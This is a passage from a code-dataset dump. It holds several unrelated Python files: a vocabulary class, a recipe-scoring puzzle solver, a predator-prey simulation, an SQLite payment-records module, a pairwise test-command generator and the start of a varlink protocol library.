list_\n\ncProfile.run('random_list_1(10000)')\ncProfile.run('random_list_2(10000)')\ncProfile.run('random_list_3(10000)')\n","sub_path":"rand_list.py","file_name":"rand_list.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76529991","text":"from collections import defaultdict\n\n\nclass Vocabulary:\n def __init__(self, unk_symbol, sos_symbol=None, eos_symbol=None):\n # NOTE: keep these two updated with each other\n self.unk_symbol = unk_symbol\n self.w2i = defaultdict(lambda: len(self.w2i))\n self.i2w = dict()\n self.is_frozen = False\n self.unk_idx = self.__getitem__(unk_symbol) # add to 0th index\n if sos_symbol:\n self.sos_symbol = sos_symbol\n self.sos_idx = self.__getitem__(sos_symbol)\n if eos_symbol:\n self.eos = eos_symbol\n self.eos_idx = self.__getitem__(eos_symbol)\n\n def __getitem__(self, word):\n \"\"\"\n Get the index of the word in the vocab. If it is not in the vocab and the vocab is not frozen,\n add it to the vocab.\n \"\"\"\n if self.is_frozen:\n if word in self.w2i:\n return self.w2i[word]\n return self.unk_idx\n index = self.w2i[word]\n self.i2w[index] = word\n return index\n\n def __len__(self):\n return len(self.w2i)\n\n def freeze(self):\n self.is_frozen = True\n\n\nif __name__ == '__main__':\n print('Testing...')\n v = Vocabulary('')\n assert(len(v) == 1)\n assert(v['hello'] == 1)\n assert(len(v) == 2)\n assert(list(v.w2i.keys()) == ['', 'hello'])\n assert(list(v.i2w.keys()) == [0, 1])\n v.freeze()\n assert(v['hello'] == 1)\n assert(v['hi'] == 0)\n assert(len(v) == 2)\n print('Done.')\n","sub_path":"vocab.py","file_name":"vocab.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208376957","text":"'''\nSugar: capacity 3, durability 0, flavor 0, texture -3, calories 2\nSprinkles: capacity -3, durability 3, flavor 0, texture 0, calories 9\nCandy: capacity -1, durability 0, flavor 4, texture 0, calories 1\nChocolate: capacity 0, durability 0, flavor -2, texture 2, calories 8\n\nc = sugar*3 - sprinkles*3 - candy\nd = sprinkles*3\nf = candy*4 - chocolate*2\nt = chocolate*2 - sugar*3\n\n'''\nhigh = 0\nrecipe = None\nfor iCandy in range(1, 101):\n counts = {'Candy': iCandy}\n for iSprinkles in range(1, 101-iCandy):\n counts['Sprinkles'] = iSprinkles\n for iSugar in range(1, 101-(iCandy+iSprinkles)):\n counts['Sugar'] = iSugar\n counts['Chocolate'] = 100 - (iCandy+iSprinkles+iSugar)\n\n capacity = counts['Sugar']*3 - counts['Sprinkles']*3 - counts['Candy']\n durability = counts['Sprinkles']*3\n flavor = counts['Candy']*4 - counts['Chocolate']*2\n texture = counts['Chocolate']*2 - counts['Sugar']*3\n calories = counts['Sugar']*2 + counts['Sprinkles']*9 + counts['Candy'] + counts['Chocolate']*8\n\n if calories == 500:\n score = max(0, capacity) * max(0, durability) * max(0, flavor) * max(0, texture)\n if score > high:\n high = score\n recipe = counts.copy()\n\nprint(high)\n","sub_path":"15-2.py","file_name":"15-2.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"376246834","text":"import random\r\nimport time\r\n\r\n# array\r\n\r\nanimals = []\r\n\r\n# classes\r\n\r\nclass Animal:\r\n def __init__(self, frailty, gender):\r\n self.frailty = frailty\r\n self.gender = gender\r\n self.age = 0\r\n self.die = False\r\n self.days_not_eaten = 0\r\n self.pregnant = False\r\n self.pregnancy = 0\r\n\r\n def disease(self):\r\n chance = 1 - (self.frailty / 100)\r\n\r\n if chance > 0.5:\r\n d = random.randint(0, 50)\r\n if d > 45:\r\n self.die = True\r\n\r\n if chance > 0.8:\r\n d = random.randint(0, 50)\r\n if d > 30:\r\n self.die = True\r\n\r\n def feed(self):\r\n food = random.randint(100, 10000)\r\n food_eaten = 0\r\n chance = 1 - (self.frailty / 100)\r\n\r\n if chance >= 0.8:\r\n d = random.randint(0, 50)\r\n if d > 10:\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance > 0.8:\r\n d = random.randint(0, 50)\r\n if d > 30:\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance < 0.5:\r\n d = random.randrange(0, 50)\r\n if d > 45:\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n old_frailty = self.frailty\r\n self.frailty -= food_eaten\r\n\r\n if old_frailty == self.frailty:\r\n self.days_not_eaten += 1\r\n\r\n def update(self):\r\n self.age += 1\r\n if self.age > 360:\r\n self.frailty += 1\r\n\r\n if self.gender == \"F\":\r\n self.pregnancy += 1\r\n\r\n# types of animal\r\n\r\nclass Rabbit(Animal):\r\n def animal_type(self):\r\n return \"Rabbit\"\r\n\r\n def breed(self):\r\n if self.frailty <= 50 and self.gender == \"F\" and self.age > 7:\r\n chance = random.randint(0, 100)\r\n if chance > 60:\r\n self.pregnant = True\r\n\r\n def check_birth(self):\r\n if self.pregnancy == 30 and self.gender == \"F\":\r\n self.pregnant = False\r\n self.pregnancy = 0\r\n litter = 0\r\n for i in range(1, random.randint(4, 12)):\r\n animals.append(genAnimal(\"Rabbit\"))\r\n litter += 1\r\n print(\" >> A rabbit gave birth to a litter of \" + str(litter) + \" pups.\")\r\n\r\nclass Fox(Animal):\r\n def animal_type(self):\r\n return \"Fox\"\r\n\r\n def breed(self):\r\n if self.frailty <= 30 and self.gender == \"F\" and self.age > 28:\r\n chance = random.randint(0, 100)\r\n if chance > 80:\r\n self.pregnant = True\r\n\r\n def check_birth(self):\r\n if self.pregnancy == 30 and self.gender == \"F\":\r\n self.pregnant = False\r\n self.pregnancy = 0\r\n litter = 0\r\n for i in range(1, random.randint(2,4)):\r\n animals.append(genAnimal(\"Fox\"))\r\n litter += 1\r\n print(\" >> A fox gave birth to a litter of \" + str(litter) + \" pups.\")\r\n\r\n def hunt(self, r):\r\n for rabbit in r:\r\n\r\n try:\r\n if r[r.index(rabbit)][1] > 40:\r\n chance = random.randint(0, 100)\r\n if chance > 87:\r\n del animals[r[r.index(rabbit)][0]]\r\n print(\" >> A rabbit was hunted by a fox.\")\r\n\r\n else:\r\n chance = random.randint(0, 100)\r\n if chance > 94:\r\n del animals[r[r.index(rabbit)][0]]\r\n print(\" >> A rabbit was hunted by a fox.\")\r\n\r\n except IndexError:\r\n continue\r\n\r\n def feed(self):\r\n no_rabbits = 0\r\n rabbits_i = []\r\n\r\n for animal in animals:\r\n try:\r\n if animal.animal_type() == \"Rabbit\":\r\n no_rabbits += 1\r\n rabbits_i.append([animals.index(animal), animal.frailty])\r\n\r\n except AttributeError:\r\n continue\r\n\r\n food = no_rabbits\r\n food_eaten = 0\r\n chance = 1 - (self.frailty / 100)\r\n\r\n if chance >= 0.8:\r\n d = random.randint(0, 50)\r\n if d > 10:\r\n self.hunt(rabbits_i)\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance > 0.8:\r\n d = random.randint(0, 50)\r\n if d > 30:\r\n self.hunt(rabbits_i)\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n if chance < 0.5:\r\n d = random.randrange(0, 50)\r\n if d > 45:\r\n self.hunt(rabbits_i)\r\n food_eaten += 1\r\n food -= 1\r\n else:\r\n self.frailty += 1\r\n\r\n old_frailty = self.frailty\r\n self.frailty -= food_eaten\r\n\r\n if old_frailty == self.frailty:\r\n self.days_not_eaten += 1\r\n\r\n# functions\r\n\r\ndef genAnimal(type):\r\n chance = random.randint(0, 100)\r\n g = [\"F\", \"M\"]\r\n\r\n if chance >= 99 and type in [\" \", \"Fox\"]:\r\n frailty = random.randint(0, 5)\r\n gender = random.choice(g)\r\n return Fox(frailty, gender)\r\n\r\n if chance < 99 and type in [\" \", \"Rabbit\"]:\r\n frailty = random.randint(0, 20)\r\n gender = random.choice(g)\r\n return Rabbit(frailty, gender)\r\n\r\ndef randomGen():\r\n global animals\r\n for i in range(1, random.randint(10, 1000)):\r\n animals.append(genAnimal(\" \"))\r\n\r\ndef report(no_rabbits_dead, no_foxes_dead, no_rabbits, no_foxes, week):\r\n print(\"\\n\")\r\n print(\" >> WEEK \" + str(week) + \" REPORT <<\" + \"\\n\")\r\n \r\n print(\" >> Total number of animals: \" + str(no_rabbits + no_foxes))\r\n print(\" >> Total number of rabbits: \" + str(no_rabbits))\r\n print(\" >> Total number of foxes: \" + str(no_foxes))\r\n print(\" >> Total number of dead animals: \" + str(no_rabbits_dead + no_foxes_dead))\r\n print(\" >> Total number of dead rabbits: \" + str(no_rabbits_dead))\r\n print(\" >> Total number of dead foxes: \" + str(no_foxes_dead))\r\n\r\n print(\"\\n\")\r\n\r\n# logic\r\n\r\nweek = 0\r\n\r\nrandomGen()\r\n\r\nno_rabbits_dead = 0\r\n\r\nno_foxes_dead = 0\r\n\r\nno_rabbits = 0\r\n\r\nno_foxes = 0\r\n\r\nwhile True:\r\n\r\n length = len(animals)\r\n\r\n for animal in animals:\r\n\r\n if isinstance(animal, Animal) == True:\r\n animal.update()\r\n animal.disease()\r\n animal.feed()\r\n animal.breed()\r\n animal.check_birth()\r\n\r\n else:\r\n continue\r\n\r\n if animal.die == True:\r\n if animal.animal_type() == \"Rabbit\":\r\n no_rabbits_dead += 1\r\n\r\n if animal.animal_type() == \"Fox\":\r\n no_foxes_dead += 1\r\n\r\n del animal\r\n continue\r\n\r\n if animal.die == False:\r\n if animal.animal_type() == \"Rabbit\":\r\n no_rabbits += 1\r\n\r\n if animal.animal_type() == \"Fox\":\r\n no_foxes += 1\r\n\r\n if animal.days_not_eaten == 3:\r\n del animal\r\n continue\r\n\r\n if no_foxes + no_rabbits == 0:\r\n print(\"\\n | SIMULATION OVER |\")\r\n print(\"\\n >> All the animals have died!\")\r\n break\r\n\r\n if animals[0].age % 7 == 0: # does report each week\r\n\r\n week += 1\r\n time.sleep(1)\r\n report(no_rabbits_dead, no_foxes_dead, no_rabbits, no_foxes, week)\r\n\r\n no_rabbits_dead = 0\r\n\r\n no_foxes_dead = 0\r\n\r\n no_rabbits = 0\r\n\r\n no_foxes = 0\r\n\r\n","sub_path":"Breeding Like Rabbits.py","file_name":"Breeding Like Rabbits.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244435405","text":"import sqlite3\nfrom collections import namedtuple\n\n\ndef make_db(clear=None):\n with sqlite3.connect('company.db3') as conn:\n cursor = conn.cursor()\n if clear is not None:\n cursor.execute('drop table if exists terminal;')\n cursor.execute('drop table if exists debit;')\n cursor.execute('drop table if exists credit;')\n cursor.execute('drop table if exists partner;')\n cursor.execute('drop table if exists payment;')\n cursor.execute('''create table if not exists terminal (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n configuration TEXT,\n title TEXT,\n comment TEXT,\n pub_key TEXT);\n ''')\n\n cursor.execute('''create table if not exists partner (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n title TEXT,\n comment TEXT);\n ''')\n\n cursor.execute('''create table if not exists debit (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n agent_id INT,\n datetime TEXT,\n summ INT,\n FOREIGN KEY (agent_id) REFERENCES partner(id));\n ''')\n\n cursor.execute('''create table if not exists credit (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n agent_id INT,\n datetime TEXT,\n summ INT,\n FOREIGN KEY (agent_id) REFERENCES partner(id));\n ''')\n cursor.execute('''create table if not exists payment (\n id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n datetime TEXT,\n terminal_id INT,\n transaction_id INT,\n partner_id INT,\n summ INT,\n FOREIGN KEY (terminal_id) REFERENCES terminal(id),\n FOREIGN KEY (partner_id) REFERENCES partner(id));\n ''')\n\n\nTerminal = namedtuple('Terminal', ('id_', 'configuration', 'title',\n 'comment', 'pub_key'))\nPartner = namedtuple('Partner', ('id_', 'title', 'comment'))\nDebet = namedtuple('Debet', ('id_', 'agent_id', 'datetime', 'summ'))\nCredit = namedtuple('Credit', ('id_', 'agent_id', 'datetime', 'summ'))\nPayment = namedtuple('Payment', ('id_', 'datetime', 'terminal_id',\n 'transaction_id', 'partner_id', 'summ'))\n\n\ndef db_connect():\n conn = sqlite3.connect('company.db3')\n return conn\n\n\nclass TerminalDb:\n def __init__(self):\n self.conn = db_connect()\n self.cursor = self.conn.cursor()\n\n def write_to_terminal(self, terminal):\n try:\n self.cursor.execute('''insert into `terminal` (`configuration`,\n `title`, `comment`, `pub_key`)\n values(?, ?, ?, ?);''',\n (terminal.configuration, terminal.title,\n terminal.comment, terminal.pub_key))\n self.conn.commit()\n except:\n self.conn.rollback()\n\n def get_all_terminals(self):\n self.cursor.execute('''select * from `terminal`;''')\n result = self.cursor.fetchall()\n return result\n\n def get_terminal_by_id(self, id_):\n self.cursor.execute('''select * from `terminal` where id = ?;''',\n (id_, ))\n result = self.cursor.fetchone()\n return result\n\n\nclass PartnerDb:\n def __init__(self):\n self.conn = db_connect()\n self.cursor = self.conn.cursor()\n\n def write_to_partner(self, partner):\n try:\n self.cursor.execute('''insert into `partner`\n (`title`, `comment`)\n values(?, ?);''', (partner.title,\n partner.comment))\n self.conn.commit()\n except:\n self.conn.rollback()\n\n def get_all_partners(self):\n self.cursor.execute('''select * from `partner`;''')\n result = self.cursor.fetchall()\n return result\n\n def get_partner_by_id(self, id_):\n self.cursor.execute('''select * from `partner` where id = ?;''',\n (id_, ))\n result = self.cursor.fetchone()\n return result\n\n\nclass PaymentDb:\n def __init__(self):\n self.conn = db_connect()\n self.cursor = self.conn.cursor()\n\n def write_to_payment(self, payment):\n try:\n self.cursor.execute('''insert into `payment`\n (`datetime`,\n `terminal_id`,\n `transaction_id`,\n `partner_id`,\n `summ`)\n values(?, ?, ?, ?, ?);''',\n (payment.datetime,\n payment.terminal_id,\n payment.transaction_id,\n payment.partner_id,\n payment.summ))\n self.conn.commit()\n except:\n self.conn.rollback()\n\n def get_all_payments(self):\n self.cursor.execute('''select * from `payment`;''')\n result = self.cursor.fetchall()\n return result\n\n\nclass CreditDb:\n pass\n\n\nclass DebetDb:\n pass\n\n\nclass TerminalWorker:\n def __init__(self, repository):\n self.repository = repository\n\n def write_to_terminal(self, terminal):\n self.repository.write_to_terminal(terminal)\n\n def get_terminal_by_id(self, id_):\n return Terminal(*self.repository.get_terminal_by_id(id_))\n\n def get_all_terminals(self):\n return self.repository.get_all_terminals()\n\n def delete_terminal_by_id(self):\n pass\n\n\nclass PartnerWorker:\n def __init__(self, repository):\n self.repository = repository\n\n def write_to_partner(self, partner):\n self.repository.write_to_partner(partner)\n\n def get_all_partners(self):\n return self.repository.get_all_partners()\n\n def get_partner_by_id(self, id_):\n return Partner(*self.repository.get_partner_by_id(id_))\n\n def delete_partner_by_id(self):\n pass\n\n\nclass PaymentWorker:\n def __init__(self, repository):\n self.repository = repository\n\n def write_to_payment(self, payment):\n self.repository.write_to_payment(payment)\n\n def get_all_payment(self):\n return self.repository.get_all_payments()\n\n def get_payment_by_id(self):\n pass\n\n\n\ndef main():\n pass\n # make_db(clear=1)\n # t = Terminal(\"00\", \"{'key': 'Value''}\", \"Terminal1\", \"Term1\", \"KEY\")\n # print(t)\n # tr = TerminalDb()\n # tw = TerminalWorker(tr)\n\n # for i in range(2, 20):\n # t = Terminal(\"00\", \"{'key': 'Value''}\", \"Terminal{}\".format(i), \"Term{}\".format(i), \"KEY\")\n # print(t)\n # tw.write_to_terminal(t)\n # t = tw.get_all_terminals()\n pr = PartnerDb()\n pw = PartnerWorker(pr)\n\n # for i in range(1, 20):\n # p = Partner(\"00\", \"Company{}\".format(i), \"Comment\")\n # print(p)\n # pw.write_to_partner(p)\n p = pw.get_all_partners()\n print(p)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson_3/hw3/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91514711","text":"# coding : utf-8\nimport sys\nfrom random import sample\n\n\n# classe argument : permet de verifier si un argument est un flag, et quelles valeurs sont possibles\nclass Argument:\n # constructeur\n def __init__(self, name, is_flag, values):\n self.name = name\n self.is_flag = is_flag\n if is_flag:\n self.values = [\"_on\", \"_off\"]\n else:\n self.values = values\n\n\nclass TestSet:\n \"\"\"\n class constructing a set of permutations of arguments to call on an application to execute a pairwise\n cover test.\n \"\"\"\n\n def __init__(self, app_name, file_args, file_consts, file_commands):\n \"\"\"\n constructor\n :param app_name: the string to call to execute the app without arguments\n :param file_args: path to file containing the possible arguments for the app and their values\n :param file_consts: path to file containing the constraints defining forbidden combinations\n of arguments and values in conjunction.\n \"\"\"\n self.app_name = app_name\n if self.app_name.isspace():\n raise Exception(\"app_name empty\")\n self.file_args = file_args\n self.file_consts = file_consts\n self.file_commands = file_commands\n self.arguments = []\n # constraint separation, between binary constraints, and N-ary constraints\n self.complex_constraints = []\n self.pair_constraints = []\n # pairs still to be satisfied\n self.pairs = []\n # permutations of arguments to be tested for a coverage test\n self.permutations = []\n self.cover = []\n\n # initialisation of object according to files content\n self.create_list_arg()\n self.create_list_constraints()\n self.build_pairs_to_cover()\n\n def create_list_arg(self):\n\n \"\"\"\n extraction of arg_file into the form of a list of Arguments\n \"\"\"\n try:\n f = open(self.file_args, 'r')\n except FileNotFoundError:\n print(\"No arguments file found at specified path\", file=sys.stderr)\n exit(1)\n\n # split the lines of the file into a list\n lignes = f.readlines()\n f.close()\n\n for ligne in lignes:\n # drop empty lines\n if ligne.isspace():\n continue\n values = ligne.split()\n # catching the name of the argument described by the current line\n nom = values.pop(0)\n # ignoring help flag\n if nom == '-h':\n continue\n if not values:\n raise Exception(\"Empty values for argument in argument file, non compatible file\")\n # build argument object and add it to the list\n self.arguments.append(Argument(nom, values[0] == 'flag', values))\n # sorting decreasingly according to the number of parameters\n self.arguments.sort(key=lambda x: len(x.values), reverse=True)\n\n def create_list_constraints(self):\n \"\"\"\n conversion of the constraint file, taking conjunctions expressed in the file\n to a list of constraints on arguments permutations, expressed in tuples of form\n (arg1, val1, arg2, val2...) in which all the arguments arg of value val are incompatible altogether\n \"\"\"\n\n # recuperation du fichier de contraintes\n try:\n f = open(self.file_consts, 'r')\n except FileNotFoundError:\n print(\"no constraint file found\")\n return\n\n constraints = f.readlines()\n f.close()\n\n # on traite chaque contrainte puis on l'ajoute a la liste des contraintes\n for constraint in constraints:\n if constraint.isspace():\n continue\n tokens = constraint.split()\n line = []\n arg_ctr = 0\n # on traite chacune des valeurs de la contrainte :\n # - si c'est un flag, on lui ajoute la valeur _on\n # - sinon, on recupere la valeur fournie\n while tokens:\n nom = tokens.pop(0)\n arg_ctr += 1\n for e in self.arguments:\n if ('-' + nom) == e.name:\n if e.is_flag:\n line.append((nom, \"_on\"))\n else:\n try:\n val = tokens.pop(0)\n except IndexError:\n \"\"\"\n if conflict in this part it means that the current argument should have been a flag\n according to the constraint file, but is registered as a binary argument in argument\n file.\n \"\"\"\n print(\"--------------------------------------------\\n\" +\n \"constraint file inconsistent with arguments.\\n\" +\n \"--------------------------------------------\", file=sys.stderr)\n exit(1)\n\n line.append((nom, val))\n break\n\n # separation of constraints: pairs for direct elimination of pairs to cover, complex for later use\n if arg_ctr == 2:\n self.pair_constraints.append(set(line))\n else:\n self.complex_constraints.append(set(line))\n\n def build_pairs_to_cover(self):\n \"\"\"\n function populating the list of pairs that are to be tested for the application\n ( 2-combination of the set of parameters )\n \"\"\"\n argc = len(self.arguments)\n for i in range(argc):\n for value1 in self.arguments[i].values:\n for j in range(i + 1, argc):\n for value2 in self.arguments[j].values:\n self.pairs.append({(self.arguments[i].name, value1), (self.arguments[j].name, value2)})\n\n def delete_matched_pairs(self, permutation):\n \"\"\"\n deletion of pairs that are matched by a set of couple (argument, value)\n :param permutation: set of couple (argument, value) to evaluate for the match\n \"\"\"\n for pair in self.pairs:\n if pair.issubset(permutation):\n self.pairs.remove(pair)\n\n def is_transgressing_constraint(self, permutation):\n \"\"\"\n tests a permutation for constraint infringement\n :param permutation: permutation to test\n :return: True if the permutation is invalid regarding the constraints, False else\n \"\"\"\n for constraint in self.pair_constraints:\n if constraint.issubset(permutation):\n return True\n for constraint in self.complex_constraints:\n if constraint.issubset(permutation):\n return True\n return False\n\n def eval_permutation(self, permutation):\n \"\"\"\n :param permutation: (argument, value)list permutation\n :return: number of yet unmatched pairs ((arg1, val1), (arg2, val2)) matched by this permutation.\n \"\"\"\n return sum([pair <= permutation for pair in self.pairs])\n\n def get_valid_arg(self, permutation, exploration_window=10):\n \"\"\"\n :param permutation: permutation to which we want to add a new (argument, value) couple\n :param exploration_window: the number of valid arguments for this set to be compared\n :return: the most effective couple in term of matching pairs in pairs yet to cover\n \"\"\"\n # select_ctr: number of valid args tested for the current permutation\n select_ctr = 0\n # number of pairs matched by the most effective valid new argument\n max_sat = 0\n # most effective new arg to add to the permutation\n selected = None\n # list of arg names already presents in the permutation\n permutation_args = [argval[0] for argval in permutation]\n\n # foreach pairs (set of two (arg, val) tuples) non matched\n for pair in self.pairs:\n list_pair = list(pair)\n \"\"\"\n if the first (arg, val) in pair is in the permutation, and the second argument isn't set yet in the\n permutation, or vice versa, add temporarily the argument to check if the new member doesn't make the\n permutation illegal according to constraints, if not then evaluate the effectiveness on the reduction\n of unmatched pairs number. save the best score and (arg, val) corresponding at each iteration.\n \"\"\"\n if (list_pair[0] in permutation and list_pair[1][0] not in permutation_args) or \\\n (list_pair[1] in permutation and list_pair[0][0] not in permutation_args):\n first = list_pair[0] in permutation\n permutation_tmp = set(permutation)\n permutation_tmp.add(list_pair[first])\n if not self.is_transgressing_constraint(permutation_tmp):\n sat = self.eval_permutation(permutation_tmp)\n if sat > max_sat:\n max_sat = sat\n selected = list_pair[first]\n select_ctr += 1\n # break when we reached the depth of exploration we specified\n if select_ctr >= exploration_window:\n break\n return selected\n\n def build_args_permutations_grow(self, exploration_window=10):\n \"\"\"\n first phase of permutation set generation, building a covering set of possibly incomplete arguments permutations\n :param exploration_window: argument propagation to get_valid_arg\n \"\"\"\n # while all the 2-combination of arguments isn't matched\n while self.pairs:\n # if there is already a permutation in the set, try to expand it, else pick the first unmatched pair\n if self.permutations:\n permutation_seed = self.permutations.pop(0)\n else:\n permutation_seed = self.pairs.pop(0)\n permutation_seed = set(permutation_seed)\n # if the permutation isn't complete try to expand it, else add it to the covering set\n if len(permutation_seed) < len(self.arguments):\n new_arg = self.get_valid_arg(permutation_seed, exploration_window)\n # if the permutation isn't growing anymore, store it in queue of self.permutation for later treatment\n if new_arg is None:\n self.permutations.append(permutation_seed)\n self.permutations.insert(0, set(self.pairs.pop(0)))\n continue\n permutation_seed.add(new_arg)\n self.delete_matched_pairs(permutation_seed)\n self.permutations.insert(0, permutation_seed)\n else:\n self.cover.append(permutation_seed)\n\n def build_args_permutations(self, exploration_window=10, recombination_threshold=10, repetitions=3):\n \"\"\"\n method building the set of covering permutations\n\n :param exploration_window: number of valid arguments to be tested during the growing of permutations at\n each iteration\n :param recombination_threshold: threshold size at which the heuristic tries to recombine a permutation with\n another smaller one\n :param repetitions: number of passes of welding_short_permutations\n \"\"\"\n self.build_args_permutations_grow(exploration_window)\n self.weld_short_permutations(recombination_threshold, repetitions)\n # queueing the incomplete permutations to the cover table\n self.cover.extend(self.permutations)\n self.permutations.clear()\n\n def weld_short_permutations(self, recombination_threshold, repetitions):\n \"\"\"\n try to combine all the permutations shorter than a certain size, trying to reduce the final set\n :param recombination_threshold: threshold size\n :param repetitions: number of passes on all the permutations\n \"\"\"\n # multiple passes for more compact set of permutations\n for _ in range(repetitions):\n \"\"\"\n foreach incomplete permutation shorter than threshold recombine with another permutation not containing\n any of its own arguments\n \"\"\"\n for permutation1 in self.permutations:\n if len(permutation1) < recombination_threshold:\n args1 = set([arg for (arg, val) in permutation1])\n for permutation2 in self.permutations:\n args2 = set([arg for (arg, val) in permutation2])\n if args1.isdisjoint(args2):\n permutation_tmp = permutation1.union(permutation2)\n if not self.is_transgressing_constraint(permutation_tmp):\n self.permutations.append(permutation_tmp)\n self.permutations.remove(permutation1)\n self.permutations.remove(permutation2)\n break\n\n def complete_short_permutations(self):\n \"\"\"\n to be executed at the end of build_args_permutations: completes non significant missing arguments of\n permutations with random values\n \"\"\"\n\n for permutation in self.cover:\n args_in = [arg for arg, val in permutation]\n if len(permutation) < len(self.arguments):\n for argument in self.arguments:\n if argument.name not in args_in:\n if not argument.is_flag:\n permutation.add((argument.name, sample(argument.values, 1)[0]))\n args_in.append(argument.name)\n\n def generate_commands(self):\n \"\"\"\n generation (or overwrite) of the file (specified in self.const_file) containing the set of commands.\n \"\"\"\n f = open(self.file_commands, 'w')\n for permutation in self.cover:\n command = self.app_name\n for (arg, val) in permutation:\n # if value is _off - meaning the absence of flag - skip to the next argument\n if val == '_off':\n continue\n # if value is _on only put the flag name\n elif val == '_on':\n command += \" \" + arg\n # case of negative value of negative numeric argument (- prefix messing with bash)\n elif val[0] == '-':\n command += ' {} \"{}\"'.format(arg, val)\n else:\n command += \" {} {}\".format(arg, val)\n\n command += '\\n'\n f.write(command)\n\n def build_pairs_from_command(self, command):\n \"\"\"\n regenerate pairs covered by a command, for coverage control\n :param command: said command\n :return : the pairs covered by the command\n \"\"\"\n\n # args listed in the command\n args = []\n\n # generation of couples (arg, val) from the command\n if not command.isspace():\n tokens = command.split()\n # first token is app_name\n tokens.pop(0)\n # for all arguments in command build (arg, val) couple\n while tokens:\n nom = tokens.pop(0)\n for e in self.arguments:\n if nom == e.name:\n if e.is_flag:\n args.append((nom, \"_on\"))\n else:\n val = tokens.pop(0)\n # purge of quotes added on arguments values starting with \"-\"\n val = val.replace('\\\"', '')\n args.append((nom, val))\n break\n # adjunction of non present flags\n args_names = [nom for nom, val in args]\n for argument in self.arguments:\n if argument.is_flag and argument.name not in args_names:\n args.append((argument.name, \"_off\"))\n # 2-combination of (arg, val) couples == pairs covered by the command\n pairs = []\n while args:\n arg1 = args.pop(0)\n for arg2 in args:\n pair = {arg1, arg2}\n if not self.is_transgressing_constraint(pair):\n pairs.append({arg1, arg2})\n return pairs\n\n def check_cover(self):\n \"\"\"\n control method to ensure that the set of commands generated is pairwise covering\n \"\"\"\n # regenerate pairs to cover\n self.build_pairs_to_cover()\n try:\n f = open(self.file_commands, 'r')\n except FileNotFoundError:\n print(\"Problem occurred between generation and checking:\\n\"\n \" commands_file has been deleted or made unreadable\", file=sys.stderr)\n commands = f.readlines()\n # foreach commands in the commands_file regenerate pairs covered by it, and delete them from the pairs to cover\n for command in commands:\n pairs = self.build_pairs_from_command(command)\n for pair in pairs:\n try:\n while True:\n self.pairs.remove(pair)\n except ValueError:\n pass\n # if remaining pairs, generation is faulty\n if self.pairs:\n print(\"the command set generated isn't pairwise covering\", file=sys.stderr)\n exit(1)\n\n\ndef usage():\n print(\"question1.py \")\n print(\"with:\")\n print(\" = path of application invocation without parameters\")\n print(\" = file containing the arguments and their possible values\")\n print(' = file containing the constraints to apply on pairwise cover')\n print(\" = file regrouping all the commands generated\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 5:\n usage()\n exit(1)\n\n ts = TestSet(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n thresh = 9 * len(ts.arguments) / 10\n ts.build_args_permutations(exploration_window=10, recombination_threshold=thresh)\n ts.complete_short_permutations()\n ts.generate_commands()\n ts.check_cover()\n","sub_path":"TP2/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":18372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"127598913","text":"from Quadruple import Quadruple\n\nclass ReturnIR(Quadruple):\n # return y\n def __init__(self, y):\n super(ReturnIR, self).__init__()\n self.op = \"return\"\n self.arg1 = y\n self.arg2 = None\n self.result = None\n\n def __str__(self):\n return (self.op + \" \" + self.arg1)\n ","sub_path":"IR_PAI/ReturnIR.py","file_name":"ReturnIR.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"395276958","text":"#!/usr/bin/python3\n\n\"\"\"An implementation of the varlink protocol\n\nSee http://varlink.org for more information about the varlink protocol and interface definition files.\n\nFor service implementations use the SimpleServer() class, for client implementations use the Client() class.\n\n\"\"\"\n\nimport collections\nimport json\nimport os\nimport re\nimport select\nimport signal\nimport socket\nimport traceback\nfrom types import (SimpleNamespace, GeneratorType)\nfrom inspect import signature\nimport sys\n\nclass VarlinkEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, SimpleNamespace):\n return o.__dict__\n if isinstance(o, VarlinkError):\n return o.as_dict()\n return json.JSONEncoder.default(self, o)\n\nclass VarlinkError(Exception):\n \"\"\"The base class for varlink error exceptions\"\"\"\n def __init__(self, message, namespaced = False):\n if not namespaced and not isinstance(message, dict):\n raise TypeError\n # normalize to dictionary\n super().__init__(json.loads(json.dumps(message, cls=VarlinkEncoder)))\n\n def error(self):\n \"\"\"returns the exception varlink error name\"\"\"\n return self.args[0]['error']\n\n def parameters(self, namespaced = False):\n \"\"\"returns the exception varlink error parameters\"\"\"\n if namespaced:\n return json.loads(json.dumps(self.args[0]['parameters']), object_hook=lambda d: SimpleNamespace(**d))\n else:\n return self.args[0]['parameters']\n\n def as_dict(self):\n return self.args[0]\n\nclass InterfaceNotFound(VarlinkError):\n \"\"\"The standardized varlink InterfaceNotFound error as a python 